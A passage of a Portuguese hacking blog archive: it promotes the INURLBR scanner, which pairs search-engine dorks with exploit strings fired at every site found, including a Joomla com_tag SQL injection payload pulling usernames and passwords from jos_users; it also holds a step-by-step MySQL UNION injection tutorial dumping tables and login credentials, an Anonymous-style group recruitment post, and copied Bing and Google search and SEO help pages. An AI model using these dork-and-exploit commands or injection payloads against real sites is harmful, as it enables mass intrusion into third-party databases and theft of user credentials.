Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Introdução. Mostrar todas as postagens
Mostrando postagens com marcador Introdução. Mostrar todas as postagens

quinta-feira, 24 de julho de 2014

Introdução SCANNER INURLBR V1.0

Introdução SCANNER INURLBR V1.0
[+]  Introdução  
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado.  *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____
(_____)
(() ())
\   /
\ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------


Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

quinta-feira, 14 de março de 2013

Introdução Grupo de estudos Lacking Faces

A proposta da Lacking Faces é a de promover ações para um mundo melhor, dentro dos princípios da ideia Anonymous, sendo assim, oferece vários ambientes virtuais para que seus membros compartilhem informações e desenvolvam seus conhecimentos para que possam realizar seu ativismo com seriedade e eficiência.
Nesta página estão todas as informações necessárias para que os membros (ou futuros membros da Lacking Faces compreendam a rotina do grupo de estudos, suas regras e seus princípios. Além disso, é possível também a todos terem acesso aos diferentes setores da Lacking Faces.
Por fim, é de grande importância que todos tenham ciência do que consta nos links apontados abaixo, para zelar pela qualidade dos trabalhos e da aprendizagem de todos.
Contem com nossa equipe de moderadores, e vamos juntos lutar por um mundo mais justo.
Viva Anonymous.
Viva Lacking Faces.
Somos uma legião.
Link de acesso: http://lackingfaces.net/introducao/

domingo, 30 de janeiro de 2011

Sql Injection - Aprenda e evitar

Sql Injection - Aprenda e evitar


O objetivo do post é apenas mostrar o perigo de um script que permite a exploração dessa falha.


Acredito que muita gente se preocupa mais com a manipulação da string de SQL quando se trata de uma tela de login, onde o usuário digita seu login e senha para ter acesso a uma área restrita de um sistema.


Porém o problema pode ser muito mais grave, do que permitir o acesso a uma área restrita. Um exemplo seria esse mesmo sistema de produtos ou de blog, que receba por GET/POST qual produto mostrar ou qual post o leitor irá visualizar. Se essa string recebida puder ser manipulada um grande estrago pode ser feito. Acho que todos já sabem disso e já leram em diversos lugares.


Mas aqui o objetivo é mostrar como realmente fazer isso e também mostrar uma ferramente que automatiza isso, com o intuito de você testar suas urls para verificar a presença desse tipo de falha.


O código que será postado é um exemplo de um script COM FALHA.
A explicação que você vai ler abaixo foi tirado do site:
[ http://wordsecurity.wordpress.com/2009/12/16/tutorial-mysql-injection/ ]


A ferramenta na qual falei que faz isso de forma automática é a "SqliHelper", que você pode enconrar nesse site: http://reiluke.i.ph/


Aqui segue um passo-a-passo como utilizar a ferramenta:


Onde tem target coloque esse link: http://localhost/index?mes=12&ano=2009


Click em cada um dos botões, um de cada vez:
Inject => Vai testar se o site eh vulneravel
Get Database => Vai aparecer os nomes dos bancos no servidor
Get Tables => Vai mostrar as tabelas do banco de dados q vc selecionou
Get Columns => Vai mostrar as colunas da tabela q vc escolheu


Agora Selecione todos os campos da tabela e por ultimo click em: Dump Now


Você verá que caso uma tabela que contenha senhas, e essas senhas não for criptografada, o invasor terá TODAS as senhas. É importante que você sempre guarde as senhas no banco de forma criptograda, dessa forma mesmo que um usuário tenha acesso as senhas ele não conseguirá ler.


Existe um post no site que fala exatamente como criar uma senha criptografada de forma SEGURA!


http://www.codigopronto.com.br/codigo-ler/7/gera-um-hash-com-salt-aleatorio




----------------------------------------------------------------------
[Tutorial] MySQL Injection [ http://wordsecurity.wordpress.com/2009/12/16/tutorial-mysql-injection/ ]


Então , como muitos sabem uma das falhas de programação web mais encontrada na internet é de banco de dados SQL .
O que posso dizer é que para explorar não necessita de um tipo especifico de requisição ( Post ou Get ) .


Portanto vamos ao tutorial :


Antes de mais nada não é necessariamente necessario algum erro de consulta para saber se esta realmente vul , e sim sua interpretação…


Erros de consultas no mysql_error() para possivelmente vuls , por exemplo :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/renan/public_html/noticias.php on line 211

&

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘” at line 1


No caso ah erro na consulta , mas não siginifica que em todos sites estaram mostrando .
Muitos dizem que só é possivel explorar caso lhe retorne algum erro , mas nem sempre é necessario…


$id = $_GET;
$q = "SELECT * FROM informativos WHERE id = '$id'";
$r = mysql_query($q) or die(mysql_error());
?>


#################################################


Vamos a pratica :
Se adicionarmos no final de um string uma simples aspas ela ira modificar a syntax retornando algum daqueles erros acima ou não modificaria a pagina.
Nossa query de consulta com aspas no fim da string de um site seria:
SELECT * FROM informativos WHERE id = '3''


Achando Colunas
Voce pode usar duas formas de achar as colunas , por “order by” ou “union+all+select+” .


No caso de “order by” voce fica procurando até aparecer o erro ” unknown column ‘5? in ‘order clause’ ” .
Ja no ” union+all+select+ ” voce adicionaria o numero de strings que representa a qtd de colunas daquele query .
Exemplo
Aqui temos um site onde a quantidade de colunas nos retornara umas string na pagina .
www.site.com.br/informativos.php?id=3+union+all+select+1 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5 strings de ex 2,3 e 4


Mas em outros sites voce com esse mesmo tipo de consulta as colunas o erro seria :
” The used SELECT statements have a different number of columns “


——————————————————————–


Informações do host
version() => versão do MySQL
database() => nome do banco de dados da query
user() ou system_user() => usuario do banco de dados
now() => hora e data atual


Exemplo:
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,version(),5

5.0.54-log



www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,database(),5

renan



www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,user(),5

[email protected]



www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,now(),5

2009-08-28 23:19:41


——————————————————————–


Achando Tabelas
Para se achar as colunas acho facil e voce ira compreender meu raciocineo.
Por exemplo voce poderia usar metodo de chute( brute ) de tabelas ou Dumpea-las , mas quando usa-las ?
A nossa resposta é de que versões anteriores do MySQL abaixo de 5.x.y não se pode dumpear então seria por chute , só que versões acima ou ela mesmo voce utiliza o metodo
de achar as colunas por meio de information_schema ( dumpear ) .


concat concatenar = colocar em ordem


group_concat() => busca tudo o que deseja juntamente com caracters em hexadecimal
concat() => busca o que deseja juntamente com caracters em hexadecimal
concat_ws() => une


-> No caso de chute ( brute ) voce utilizaria ” +from+ :
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5+from+Renan


Se não houver a tabela de nome “Renan” ira nos retornar o erro ” Table ‘database.renan’ doesn’t exist “
Se houver nos retornaria a pagina com as mesmas strings de achado as colunas .


-> No caso de Dumpear :
Temos 2 jeitos bem faceis que voce pode escolher.


=====—————————————————-=====


1º Metodo:
Nesse metodo as tabelas estam em hexadecimal.


renan_usuarios 0x72656e616e5f7573756172696f73


Temos então um site onde queremos pegar todas as tabelas .
www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(table_name),5

+from+information_schema.tables where table_schema=database()--
Retornaria-nos as seguintes tabelas postas na pagina :
adm_area,amado_agenda_fotos,amado_cadastros,amado_fotos,amado_usuarios,site_mp3,site_testemunhe,etc.



Comandos:
group_concat(table_name)

+from+information_schema.tables+where+table_schema=database()--


Agora temos de encontrar as colunas de uma determinada tabela .
www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(column_name),5

+from+information_schema.columns+where+table_name=0x72656e616e5f7573756172696f73
Retornaria-nos as seguintes colunas postas na pagina de uma tabela :
id,login,senha,email,status


Comandos:
group_concat(column_name)
+from+information_schema.column+where+table_schema=database()--


=====—————————————————-=====


2º Metodo:
Nesse metodo as tabelas estam em decadecimal
Usaremos o limit que funcionara para selecionar as linhas conforme o database
+limit+0,1–

+limit+1,2–

+limit+2,1–

+limit+3,2–

+limit+4,3–
etc…


www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(table_name),5

+from+information_schema.tables+limit+0,1--
Retornaria-nos a seguinte tabelas posta na pagina :
CHARACTER_SETS
Para poder achar as tabelas de logins voce alternaria o limit como acima.
Comandos:
concat(table_name)

+from+information_schema.tables+limit+0,1--



renan_usuarios char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)


www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(column_name),5

+from+information_schema.columns where table_name=

char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)+limit+0,1--
Retornaria-nos a seguinte coluna posta na pagina de uma tabela :
id
Para poder achar as colunas da tabela voce alternaria o limit como acima.
Comandos:
concat(column_name)

+from+information_schema.columns where table_name=char(tabela_em_decimal)+limit+0,1–


e por fim mostrando os dados de logins
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,

concat(login,0x20,senha),5+from+renan_usuarios

Fonte:http://www.codigopronto.com.br/

sexta-feira, 21 de janeiro de 2011

Como o Bing fornece resultados de pesquisa



O Bing verifica automaticamente (ou "rastreia") a Internet para desenvolver e manter um índice. O índice é realmente um catálogo de recursos online disponíveis, incluindo sites, imagens, vídeos, documentos e outros itens. Os resultados de pesquisa específicos são criados usando um algoritmo de computador para corresponder os termos de pesquisa que você inserir com os resultados mais pertinentes e úteis em nosso índice. Em geral, tentamos fornecer uma coleção de informações online o mais abrangente e útil possível. Desenvolvemos algoritmos para fornecer os resultados mais pertinentes e determinar quais resultados são exibidos para determinada pesquisa.
O Bing não controla a operação ou o design dos sites que indexamos. Também não controlamos o que esses sites publicam. Desde que o site continue disponibilizando informações na Web, as informações geralmente estarão disponíveis para outros através do Bing ou outros serviços de pesquisa.
Em casos limitados, para conformidade comleis aplicáveis e/ou para atender a preocupações de política pública, como privacidade, proteção de propriedade intelectual e a proteção de crianças, podemos remover recursos específicos do índice de informações disponíveis. Em cada caso em que formos exigidos a fazê-lo por lei, tentaremos limitar nossa remoção de resultados de pesquisa a um conjunto limitado de circunstâncias, de modo a cumprir com a lei aplicável, mas não restringir excessivamente o acesso de usuários do Bing a informações pertinentes.
Estes são as formas pelas quais o Bing faz isso e quando.

Como ajudamos a parar a distribuição de conteúdo de abuso infantil

Infelizmente, o abuso infantil não é novidade, mas a Internet apresenta diversas oportunidades novas para aqueles que cometem crimes contra crianças, inclusive tráfico de imagens de abuso sexual. O Bing trabalha com as autoridades policiais e outras autoridades para ajudar a parar o fluxo desse conteúdo online. Uma das formas pelas quais fazemos isso é removendo informações disponíveis de nossos resultados de pesquisa em nossos links de resultados de pesquisa, que foram revisados por agências renomadas e detectados como tendo ou relacionados ao abuso infantil.
Especificamente, removemos de nossos links de resultados de pesquisa, que foram identificados pela Internet Watch Foundation (Reino Unido), NCMEC (EUA), FSM (Alemanha) como, de acordo com seu julgamento de boa-fé, hospedando ou fornecendo acesso a conteúdo de abuso infantil ilegal sob as leis de suas juridisções. A remoção desses links dos resultados de pesquisa não os impede de serem acessados na Internet ou descobertos por meios que não o Bing, mas reduz a capacidade dessas pessoas que buscam conteúdo sobre abuso infantil de localizá-lo, além de reduzir a extensão na qual os vendedores de tal conteúdo podem lucrar com ele.
Removemos esses tipos de links apenas quando temos certeza de que o governo ou agência governamental semi-oficial fornecendo o link é:
  • Uma organização renomada e confiável.
  • Limita o escopo de seu trabalho a conteúdo ilegal sobre abuso infantil.
  • Fornece alguma medida de recurso (como capacidade de apelação) se o conteúdo ou sites hospedando tal conteúdo forem bloqueados incorretamente.

Como protegemos a propriedade intelectual

Em muitos países, incluindo os Estados Unidos, os provedores de busca são obrigados a responder a reclamações de titulares de direitos sobre postagem, distribuição ou outra publicação de conteúdo protegido não autorizada. A comunidade internacional reconhece que tal publicação não autorizada pode infringir os direitos de proprietários de conteúdo e fez com que tratados internacionais e leis locais solucionassem o problema. De acordo com essas leis, e em apoio às nossas próprias diretivas incentivando o respeito pela propriedade intelectual, podemos remover determinados links de nosso índice, mediante aviso dos titulares dos direitos.
O Bing reconhece que os direitos de proprietários de conteúdo existem, além dos direitos de usuários, e que a criatividade e a inovação online devem ser incentivadas. Para esse fim, o Bing ajudou a desenvolver um conjunto de princípios em relação a aplicativos de conteúdo gerados por usuários (alguns dos quais geram links que catalogamos em nosso serviço de pesquisa). Saiba mais sobre esses princípios no endereço http://www.ugcprinciples.com. Também aceitamos contranotificações de terceiros que são contra a remoção de seu conteúdo.

Como lidamos com alegações de calúnia ou difamação

Da mesma forma, os países no mundo inteiro têm adotado leis e procedimentos para lidar com difamação, calúnia e outros danos relacionados a falsas declarações feitas ou implícitas como sendo reais e que podem gerar uma percepção negativa sobre uma pessoa, negócio ou outra empresa. Não removemos recursos contendo conteúdo alegadamente difamatório de nosso índice sem uma ordem judicial, indicando que um link específico foi considerado difamatório. Quando recebemos uma ordem judicial válida, removemos esses links definitivamente de nosso índice.

Como trabalhamos para impedir a invasão de privacidade

Periodicamente, as páginas da Web disponibilizadas publicamente terão, intencionalmente ou por engano, informações privadas publicadas sem o consentimento da pessoa identificada ou em circunstâncias que criam riscos de segurança ou privacidade. Entre os exemplos estão publicação por engano de registros públicos, números de telefone particualres, números de identificação e semelhantes, ou a publicação intencional de senhas de email, credenciais de login, números de cartão de crédito ou outros dados com intenção de serem usados para fraude ou ação de hackers.
O Bing não controla os sites que publicam essas informações ou o que eles publicam. Na maior parte do tempo, o site está na melhor posição para solucionar quaisquer problemas de privacidade sobre as informações que publica. Desde que o site continue disponibilizando informações na Web, as informações estarão disponíveis para outros. Assim que o site tiver removido as informações e tivermos rastreado o site novamente, ele não será mais exibido em nossos resultados.
Se as informações já tiverem sido removidas desse site mas ainda estiverem sendo exibidas nos resultados de pesquisa do Bing, você poderá solicitar a nossa remoção das informações usando nosso formulário de solicitação de remoção de conteúdo.

Como lidamos com spam na Web

Algumas páginas capturadas em nosso índice podem ser páginas de pouco ou nenhum valor para usuários e também podem ter características que manipulam artificialmente a forma como os sistemas de publicidade e pesquisam trabalham, a fim de distorcer sua relevância em relação às páginas que oferecem informações mais relevantes. Algumas dessas páginas incluem apenas anúncioos e/ou links para outros sites que contêm praticamente anúncios e nenhum ou apenas conteúdo superficial pertinente ao assunto da pesquisa. Para melhorar a experiência de pesquisa para clientes e fornecer conteúdo mais pertinente, removemos tais páginas do índice de uma só vez, ou ajustamos nossos algoritmos para priorizar páginas mais úteis e pertinentes em conjuntos de resultados.

Como lidamos com leis específicas para países individuais

Alguns países mantêm leis ou regulamentos que se aplicam a provedores de serviços de busca, que exigem que removamos o acesso a determinadas inforamções que o Bing tenha indexado, principalmente para fins geopolíticos ou questões ou normas culturais legais. Devemos integrar nosso apoio à liberdade de acesso a informações por pessoas de todos os países com a conformidade necessária, que nos permita oferecer os serviços de busca em uma jurisdição específica. Quando abordados com uma solicitação de remoção de resultados de pesquisa por uma entidade do governo, exigiremos comprovação da lei aplicável e autoridade da agência governamental, bem como uma solicitação oficial que exija a remoção. Se tal comprovação for fornecida e pudermos verificá-la, então poderemos cumprir com a solicitação de remoção. Se nos for exigido a implementação da solicitação, faremos isso da forma mais próxima como exigido pela lei. Se a solicitação de remoção for inconsistente com os padrões internacionais, podemos escolher buscar esclarecimento adicional para nossa obrigação de cumprimento.

Como lidamos com questões relacionadas a acesso a conteúdo para adultos

O Bing oferece configurações de Safe Search, que permitem que a maioria dos usuários defina o tipo de filtragem de conteúdo para adultos que gostaria que fosse aplicado aos seus resultados de pesquisa. Por padrão, na maioria dos mercados todas as pesquisas são definidas como moderadas, o que restringe resultados de pesquisa explícitos visualmente mas não restringe texto explícito. Devido aos costumes locais ou normas culturais, determinados países podem impor restrições legais sobre a exibição de conteúdo para adultos. Como resultado, o que constitui conteúdo para adultos pode variar dependendo do mercado.
O Bing categoriza determinados países como mercados restritos. Nesses mercados restritos, podemos restringir a exibição de conteúdo para adultos (como definido localmente) e, devido a costumes, normas e leis locais, podemos limitar as configurações do Safe Search apenas como "restritas". Definido como "restrito", o Safe Search filtra a exibição de conteúdo explícito nos resultados da pesquisa em imagens, vídeos e texto. Entre os mercados que estão limitados a "restrito" estão:
  • China
  • Hong Kong
  • Índia
  • Indonésia
  • Coreia
  • Malásia
  • Oriente Médio
  • Cingapura
  • Taiwan
  • Tailândia
  • Turquia
Fonte:goo.gl/ihWh0

Opções avançadas de pesquisa Bing - Microsoft

Opções avançadas de pesquisa  Bing - Microsoft


Símbolo Função
+ Localiza páginas da Web que contenham todos os termos precedidos pelo símbolo +. Também permite incluir termos que normalmente são ignorados.
" " Localiza as palavras exatas em uma frase.
() Localiza ou exclui páginas da Web que contenham um grupo de palavras.
E ou & Localiza páginas da Web que contenham todos os termos ou frases.
NÃO ou - Exclui páginas da Web que contenham um termo ou uma frase.
OU ou | Localiza páginas da Web que contenham um dos termos ou frases.
noteObservação
  • Por padrão, todas as pesquisas são pesquisas AND.
  • Os operadores NOT e OR precisam estar em maiúsculas. Caso contrário, o Bing irá ignorá-los como palavras de parada.
  • Palavras de parada e todos os sinais de pontuação (exceto os símbolos observados neste tópico) são ignorados, a menos que estejam entre aspas ou precedidos do símbolo +.
  • Somente os 10 primeiros termos são utilizados para obter resultados de pesquisa.
  • Os operadores booleanos e de agrupamento de termo são aceitos na seguinte ordem de preferência:

    • parênteses ()
    • aspas "
    • NOT + -
    • AND &
    • OR |

Fonte:goo.gl/Jb4Ck

terça-feira, 18 de janeiro de 2011

Ajude o google encontrar seu site

Ajude o google encontrar seu site
Siga as diretrizes abaixo para ajudar o Google a encontrar, indexar e classificar o seu site. Mesmo que você decida não implementar as sugestões, recomendamos que preste atenção às "Diretrizes de qualidade", que destacam algumas práticas ilícitas que podem levar à remoção do seu site do índice do Google ou a outro tipo de penalidade. Se um site for penalizado, ele não será mais exibido nos resultados no Google.com.br ou em qualquer site parceiro do Google.

Quando o seu site estiver pronto:
Diretrizes de conteúdo e design
  • Construa um site com uma hierarquia clara e links de texto. Cada página deve ser acessada a partir de pelo menos um link de texto estático.
  • Mostre aos usuários um mapa do site que relacione o tópico às partes importantes do seu site. Se o mapa do site tiver muitos links, convém dividi-lo em várias páginas.
  • Utilize um número razoável de links por página.
  • Crie um site útil, com muitas informações e páginas que descrevam de forma clara e precisa o seu conteúdo.
  • Pense nas palavras que os usuários digitariam para encontrar as suas páginas e verifique se elas aparecem no seu site.
  • Tente usar texto, em vez de imagens, para exibir nomes, conteúdo ou links importantes. O rastreador do Google não reconhece texto contido em imagens. Se for necessário usar imagens para conteúdo de texto, avalie a possibilidade de usar o atributo "ALT" para incluir algumas palavras de texto descritivo.
  • Verifique se os elementos e os atributos alt são descritivos e precisos.
  • Verifique se há links quebrados e corrija o código HTML.
  • Se você decidir usar páginas dinâmicas (por exemplo, o URL que contém um caractere “?”), saiba que nem todos os spiders de mecanismos de pesquisa rastreiam as páginas dinâmicas e estáticas. Isso ajuda a manter os parâmetros curtos e a quantidade desses parâmetros pequena.
  • Analise as nossas diretrizes para imagens para conhecer as práticas recomendadas na publicação de imagens.
Diretrizes técnicas
  • Use um navegador de texto como o Lynx para examinar o seu site, pois muitos spiders de mecanismos de pesquisa veem o site do mesmo modo que o Lynx. Se recursos especiais como JavaScript, cookies, IDs de sessão, frames, DHTML ou Flash permitirem que você veja todo o site em um navegador de texto, os spiders dos mecanismos de pesquisa poderão ter dificuldade em rastrear o seu site.
  • Deixe que os robôs de pesquisa rastreiem o seu site sem que IDs de sessão ou argumentos acompanhem suas trajetórias no site. Essas técnicas são úteis para monitorar um determinado comportamento do usuário, mas o padrão de acesso dos robôs é completamente diferente. Se você usar essas técnicas, a indexação do seu site poderá ser incompleta, já que os robôs talvez não consigam eliminar os URLs que têm aspecto diferente, mas que apontam para a mesma página.
  • Verifique se o servidor web suporta o cabeçalho "If-Modified-Since HTTP". Esse recurso permite que o servidor web informe ao Google se houve alteração no conteúdo desde o último rastreamento do site. A utilização desse recurso permite obter economia na largura de banda e nas despesas gerais.
  • Use o arquivo robots.txt no servidor web. Esse arquivo informa aos rastreadores quais diretórios podem ou não ser rastreados. Verifique se ele está disponível no site para que você não bloqueie acidentalmente o rastreador do Googlebot. Acesse http://www.robotstxt.org/faq.html para saber como instruir os robôs quando visitarem o site. Você pode testar seu arquivo robots.txt para verificar se está utilizando-o corretamente com a ferramenta de análise do robots.txt disponível nas Ferramentas do Google para webmasters.
  • Faça um esforço para garantir que os anúncios não interfiram nas classificações dos mecanismos de pesquisa. Por exemplo, os anúncios do Google AdSense e os links do DoubleClick têm o rastreamento bloqueado por um arquivo robots.txt.
  • Se a sua empresa adquirir um sistema de gerenciamento de conteúdo, verifique se o sistema cria páginas e links que podem ser rastreados pelos mecanismos de pesquisa.
  • Use o arquivo robots.txt para evitar a indexação de páginas de resultados de pesquisa ou outras páginas geradas automaticamente que não acrescentam valor para usuários provenientes de mecanismos de pesquisa.
  • Teste o site para verificar se ele aparece corretamente em navegadores diferentes.
  • Monitore o desempenho do seu site e otimize os tempos de carregamento. A meta do Google é fornecer aos usuários resultados mais relevantes e uma ótima experiência. Sites mais rápidos aumentam a satisfação do usuário e melhoram a qualidade geral da web (especialmente para os usuários com conexões lentas com a internet), e esperamos que, à medida que os webmasters aprimoram os seus sites, a velocidade geral da web melhore. O Google recomenda a todos os webmasters monitorar regularmente o desempenho do site usando o Page Speed, o YSlow, o WebPagetest ou outras ferramentas. Para obter mais informações, ferramentas e recursos, consulte Vamos tornar a web mais rápida. Além disso, a ferramenta Desempenho do site nas Ferramentas do Google para webmasters mostra a velocidade do seu site conforme a experiência de usuários do mundo todo.
Diretrizes de qualidade
Essas diretrizes de qualidade tratam das formas mais comuns de comportamento fraudulento ou manipulador, mas o Google pode responder de forma negativa a outras práticas enganosas que não estão listadas aqui (por exemplo, registrar sites com nomes semelhantes aos de sites conhecidos, mas com uma ligeira diferença ortográfica). O fato de uma determinada técnica fraudulenta não constar desta página não significa que ela seja aprovada pelo Google. Os webmasters que se esforçam para manter os princípios básicos certamente proporcionarão uma melhor experiência aos usuários e, consequentemente, obterão melhores classificações do que aqueles que perdem tempo à procura de atalhos e brechas.
Se você acreditar que outro site está abusando das diretrizes de qualidade do Google, denuncie esse site em https://www.google.com/webmasters/tools/spamreport. O Google prefere resolver os problemas de forma automatizada e escalonável. Por isso, tentamos minimizar conflitos em relação a spams. As informações sobre spam que recebemos são usadas para criar algoritmos escalonáveis que reconheçam e bloqueiem futuras tentativas de spam.
Diretrizes de qualidade - princípios básicos
  • Crie páginas principalmente para os usuários, não para os mecanismos de pesquisa. Não engane os seus usuários nem apresente aos mecanismos de pesquisa um conteúdo diferente daquele que você exibe aos usuários, o que normalmente é chamado de "cloaking" (camuflagem do conteúdo real da página).
  • Evite truques para melhorar a classificação nos mecanismos de pesquisa. Um bom parâmetro é imaginar se você se sentiria à vontade se tivesse que justificar as suas ações para um site concorrente. Outro teste útil é perguntar a si mesmo: "Isso ajudará os meus usuários? Eu faria isso se os mecanismos de pesquisa não existissem?"
  • Não participe de esquemas em que os links são usados para aumentar a classificação do seu site ou que utilizem o PageRank. Evite, principalmente, links para autores de spam ou para "más vizinhanças" na web, já que esses tipos de link podem prejudicar a classificação do seu site.
  • Não use programas não-autorizados para enviar páginas, verificar classificações etc. Esses programas consomem recursos de computação e violam os nossos Termos de Serviço O Google não recomenda a utilização de produtos como WebPosition Gold™, que enviam consultas automáticas ou programadas ao Google.
Diretrizes de qualidade - diretrizes específicas
Se concluir que o seu site não cumpre essas diretrizes, modifique-o para que ele cumpra as diretrizes e, em seguida solicite a reconsideração do seu site.


Fonte:http://www.google.com/support/webmasters/bin/answer.py?answer=35769

Conceitos básicos do Google: como o Google rastreia, indexa e publica na web.

Conceitos básicos do Google: como o Google rastreia, indexa e publica na web.

Ao sentar em frente ao seu computador e fazer uma pesquisa no Google, você visualiza quase que instantaneamente uma lista de resultados de toda a web. Como o Google encontra páginas que correspondem à sua consulta e determina a ordem dos resultados de pesquisa? Em termos mais simples, a pesquisa na web é como procurar em um livro muito grande com um índice impressionante que diz exatamente onde tudo está localizado. Quando você faz uma pesquisa no Google, os programas verificam o índice para determinar os resultados de pesquisa mais relevantes que devem ser retornados ("publicados") para você.
Os três principais processos de retorno de resultados de pesquisa são:

Rastreamento
                                                            
O rastreamento é o processo pelo qual o Googlebot descobre páginas novas e atualizadas para serem incluídas no índice do Google.
Nós usamos um grande conjunto de computadores para buscar (ou "rastrear") bilhões de páginas na web. O programa que faz a busca é chamado Googlebot (também conhecido como robô, bot ou spider). O Googlebot usa um processo de algoritmos: programas de computador que determinam quais sites devem ser indexados, com que frequência e quantas páginas devem ser buscadas em cada site.
O processo de rastreamento do Google começa com uma lista de URLs de páginas web, gerada a partir de processos anteriores de rastreamento e aumentada com dados dos Sitemaps fornecidos por webmasters. Conforme o Googlebot visita cada um desses sites, ele detecta os links de cada página e os inclui na sua lista de páginas a serem rastreadas. Novos sites, alterações em sites existentes e links inativos serão detectados e usados para atualizar o índice do Google.
O Google não aceita pagamento para rastrear um site com mais frequência, o mantem a área de pesquisa de  negócios separada dos serviços geradores de receita do AdWords.
Indexação
                                                              
O Googlebot processa cada uma das páginas que ele rastreia para compilar um imenso índice com todas as palavras encontradas e sua localização em cada página. Além disso, processamos informações incluídas nos principais atributos e tags de conteúdo, como tags Title e atributos ALT. O Googlebot pode processar muitos tipos de conteúdo, mas não todos. Por exemplo, não podemos processar o conteúdo de alguns arquivos de mídia elaborada ou páginas dinâmicas.
Publicação de resultados
                                                            
Quando um usuário insere uma consulta, nossas máquinas pesquisam o índice de páginas correspondentes e retornam os resultados que acreditamos ser os mais relevantes para os usuários. A relevância é determinada por mais de 200 fatores, entre eles o PageRank para uma determinada página. O PageRank é a medida da importância de uma página com base nos links de entrada de outras páginas. Em termos mais simples, cada link para uma página em seu site a partir de outro site adiciona um PageRank ao seu site. Nem todos os links são iguais: o Google trabalha com afinco para melhorar a experiência do usuário, identificando links de spam e outras práticas que afetam negativamente os resultados de pesquisa. Os melhores tipos de links são aqueles retornados com base na qualidade do seu conteúdo.
Para que o seu site seja bem classificado nas páginas de resultados de pesquisa, é importante verificar se o Google pode rastrear e indexar o seu site corretamente. As Diretrizes para webmasters destacam algumas das melhores práticas que podem ajudar você a evitar as armadilhas comuns e melhorar a classificação do seu site.
Os recursos do Google Pesquisas relacionadas, Sugestões de ortografia e Google Suggest foram desenvolvidos para ajudar os usuários a economizar tempo exibindo termos relacionados, erros de digitação comuns e consultas populares. Como os  resultados de pesquisa do google.com.br, as palavras-chave usadas por esses recursos são geradas automaticamente rastreadores da web e algoritmos de pesquisa. Exibem essas sugestões apenas quando acham que podem economizar o tempo do usuário. Se um site estiver bem classificado para uma palavra-chave, é porque o google determinal com base em algoritmos que seu conteúdo é mais relevante para a consulta do usuário.


Fonte:http://www.google.com/support/websearch/bin/answer.py?answer=106230

segunda-feira, 17 de janeiro de 2011

Otimização de mecanismos de pesquisa (SEO)

SEO

SEO é o acrônimo em inglês de "otimização do mecanismo de pesquisa" ou "otimizador do mecanismo de pesquisa". A contratação de um SEO é uma decisão importante que pode aperfeiçoar seu site e poupar tempo, mas você também corre o risco de prejudicar seu site e sua reputação. Pesquise as vantagens potenciais, bem como os danos que um SEO irresponsável pode causar ao seu site. Muitos SEOs e outros consultores e agências oferecem serviços úteis para proprietários de sites, incluindo:
  • Análise do conteúdo ou da estrutura do seu site
  • Consultoria técnica sobre desenvolvimento de sites: por exemplo, hospedagem, redirecionamentos, páginas de erro, uso do JavaScript
  • Desenvolvimento de conteúdo
  • Gerenciamento de campanhas de desenvolvimento de negócios on-line
  • Pesquisa de palavras-chave
  • Treinamento de SEO
  • Experiência em regiões e mercados específicos.
A página de resultados do Google inclui resultados de pesquisa orgânicos e, frequentemente, publicidade paga (indicada pelo título "Links patrocinados") também. Anunciar no Google não terá qualquer efeito na presença do seu site em nossos resultados de pesquisa. O Google nunca aceita dinheiro para incluir ou classificar sites nos resultados de pesquisa; não há custos para aparecer em nossos resultados de pesquisa orgânicos. Recursos gratuitos, como as Ferramentas do Google para webmasters, o blog oficial do Google para webmasters e nosso fórum de discussão, podem oferecer excelentes informações sobre como otimizar o seu site para pesquisa orgânica. Muitas dessas fontes gratuitas, além de informações sobre pesquisa paga, podem ser encontradas na Central do webmaster do Google.
